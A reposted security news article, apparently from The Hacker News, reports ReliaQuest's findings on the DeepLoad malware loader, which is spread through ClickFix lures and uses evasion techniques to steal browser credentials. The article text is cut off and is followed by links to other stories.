DeepLoad Malware Uses ClickFix and WMI Persistence to Steal Browser Credentials

Staff Editor 2026-03-30
DeepLoad Malware Uses ClickFix and WMI Persistence to Steal Browser Credentials

DeepLoad Malware Uses ClickFix and WMI Persistence to Steal Browser Credentials

https://thehackernews.com/2026/03/deepload-malware-uses-clickfix-and-wmi.html

Publish Date: 2026-03-30 11:47:00

Source Domain: thehackernews.com

Ravie LakshmananMar 30, 2026Threat Intelligence / Browser Security

A new campaign has leveraged the ClickFix social engineering tactic as a way to distribute a previously undocumented malware loader referred to as DeepLoad.

“It likely uses AI-assisted obfuscation and process injection to evade static scanning, while credential theft starts immediately and captures passwords and sessions even if the primary loader is blocked,” ReliaQuest researchers Thassanai McCabe and Andrew Currie said in a report shared with The Hacker News.

The starting point of the attack chain is a ClickFix lure that tricks users into running PowerShell commands by pasting the command into the Windows Run dialog under the pretext of addressing a non-existent issue. This, in turn, uses “mshta.exe,” a legitimate Windows utility to download and run an obfuscated PowerShell loader.

The loader, for its part, has been found to conceal its actual functionality among meaningless variable assignments, likely in an attempt to deceive security tools. It’s assessed that the threat actors relied on an artificial intelligence (AI) tool to develop the obfuscation layer.

DeepLoad makes deliberate efforts to blend in with regular Windows activity and fly under the radar. This includes hiding the payload within an executable named “LockAppHost.exe,” a legitimate Windows process that manages the lock screen.

In addition, the malware covers up its own tracks by disabling PowerShell command history and invoking native Windows core functions directly instead of relying on PowerShell’s built-in commands to launch processes and modify memory. In doing so, it bypasses common monitoring hooks that keep tabs on PowerShell-based activity.

“To evade file-based detection, DeepLoad generates a secondary component on the fly by using the built-in PowerShell feature Add-Type, which compiles and runs code written in C#,” ReliaQuest said. “This produces a temporary Dynamic Link Library (DLL) file dropped into the…

Source

More Stories

Diaspo #444: From supercomputers to cybersecurity, Asmae Mhassni’s unconventional path

Diaspo #444: From supercomputers to cybersecurity, Asmae Mhassni’s unconventional path

Staff Editor 2026-06-06
Opal Security Raises Million for AI-Native Identity Governance

Opal Security Raises $23 Million for AI-Native Identity Governance

Staff Editor 2026-06-06
Free Apps Are Quietly Turning Smart TVs Into Web-Scraping Proxies for AI

Free Apps Are Quietly Turning Smart TVs Into Web-Scraping Proxies for AI

Staff Editor 2026-06-06

Terms and Conditions - Privacy Policy